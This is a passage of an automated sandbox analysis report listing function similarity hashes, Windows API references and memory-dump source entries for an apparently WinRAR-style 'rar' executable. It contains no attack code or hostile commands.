                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: wcschr
                                                                                                                                                                                                                                        • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                        • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                        • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                        • Instruction ID: 51b4439e22b2a4732e85f77742302db6cf45b94f0d5bd67a207c9b90f59743a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B641B012D0E583E0EA239F21526157E9391AF11B84F9844B7EA6DCA2D5EE2DFC53C331
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00007FF6AA1A359E
                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1A35E6
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6AA1A305D,?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800), ref: 00007FF6AA1A30F0
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6AA1A3119
                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1A3651
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                        • String ID: %u.%03u
                                                                                                                                                                                                                                        • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                        • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                        • Instruction ID: 5a48b5e9f4e9d639b2b4f5ce51e72ea759eb1a1731c95f78590dbddcf52ce1e7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A315C25619581E1E7169B24E4113BA6261BB847B4F501337ED7E877E1DE3CE90BC300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Similarity
• API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
• String ID: csm
• API String ID: 2280078643-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: wcschr$swprintf
• String ID: %c:\
• API String ID: 1303626722-3142399695
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
• String ID:
• API String ID: 904936192-0
APIs
• CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D), ref: 00007FF6AA1A38CD
• CreateFileW.KERNEL32(?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D,?,?,00000000), ref: 00007FF6AA1A391F
• SetFileTime.KERNEL32(?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D,?,?,00000000), ref: 00007FF6AA1A399B
• CloseHandle.KERNEL32(?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D,?,?,00000000), ref: 00007FF6AA1A39A6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2287278272-0
                                                                                                                                                                                                                                        • Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                        • Instruction ID: 19e49ce783149e26f03bae8924fc19d2a299cfa89dc20dc72e2c2e821f390fbe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F41D63AB0E641A2EA528B21A41177A67A2BF817E4F504376ED9D877D4DF7CDC0B8700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 932687459-0
                                                                                                                                                                                                                                        • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                        • Instruction ID: 9e73981dcab743ddcaa67450522e6dce2dbeb1178c58adb1d3b7824bbf3c475f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A418362A0EAC2E9EB929A21D1503BD23D0EF40B84F184577DB4E86699DF2CED47C354
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4141327611-0
                                                                                                                                                                                                                                        • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                        • Instruction ID: 095ae23581577b5598825be6c6a26e1d32ebe111277dcb9629720dc337986d00
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB418721A0E742D6FB779B54D040379A6A2AF42BA8F14417ADA4986ED5DF3DDC438700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D09D
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D0E5
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D114
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D15C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction ID: 09725c9df7fe4f367c8fafa99eab74573568e3d13a09aaf32558b0de764f5d96
• Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction Fuzzy Hash: 60317332619B8582E7608F11F55476A77A0F789BB8F50432AEAAD47BC8CF3CD805CB00
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CurrentPriorityThread$ClassProcess
• String ID:
• API String ID: 1171435874-0
• Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
• Instruction ID: c210a9d39bc349a15fa3d74740bd4a5cb5bdbede008b78eb589935eefdb56f4d
• Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
• Instruction Fuzzy Hash: 23113071B1E642EAEAA68F12A4C427C6261EF84740F20407BC60AD7685DF2CBC474604
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ErrorLast$abort
• String ID:
• API String ID: 1447195878-0
• Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
• Instruction ID: 65195d108fdd635602d14509a1b444ae40fb5bb2a27258133ee38c405914867a
• Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
• Instruction Fuzzy Hash: 1C01CC20B0B642E7FABAA331965513C11924F4A7A4F4805BFE91F86FD2ED2DAC434200
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 502429940-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction ID: 21e3ec1cd2b30ae58d9275b792182d3cc46444aab73bc9ed4c611584133c58c0
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction Fuzzy Hash: DE11C632509E81E3E3559F21D94065D6330FB85790F000232D76D932A5CF39F872C704
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
• Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction ID: b1c5b3fbadba5e49fd962bc8d7b82e0d1a721ddf67bf332d9bc406f9c7a73f6b
• Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction Fuzzy Hash: 08914C62B0A3C6D6EB368F25918037C6B96AB567E4F088176CB8D47B95DE3CD913C301
APIs
  • Part of subcall function 00007FF6AA1CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6AA19CBED,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1CB730
• new.LIBCMT ref: 00007FF6AA1BCFD9
Strings
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                                                        • String ID: rar$rev
                                                                                                                                                                                                                                        • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                        • Opcode ID: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                        • Instruction ID: 1f795b36650b4d270137ca243c27868150b2598aa68fe03c76d40c0c5da2dc6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6A10422A0B692E6EA1ADB20C4542BC6365FF44784F4546B7DA5D8B7D7EF2CED42C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: *
                                                                                                                                                                                                                                        • API String ID: 3215553584-163128923
                                                                                                                                                                                                                                        • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                        • Instruction ID: 1b990cf47a02fa7368ba82500f8ca81d0fc27ac8249d88e156e82c5955419b2f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51715172D0A751E6E76A8F28804123C37E1FB45F48F2411B7EA4AC6294DF39DE82C795
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
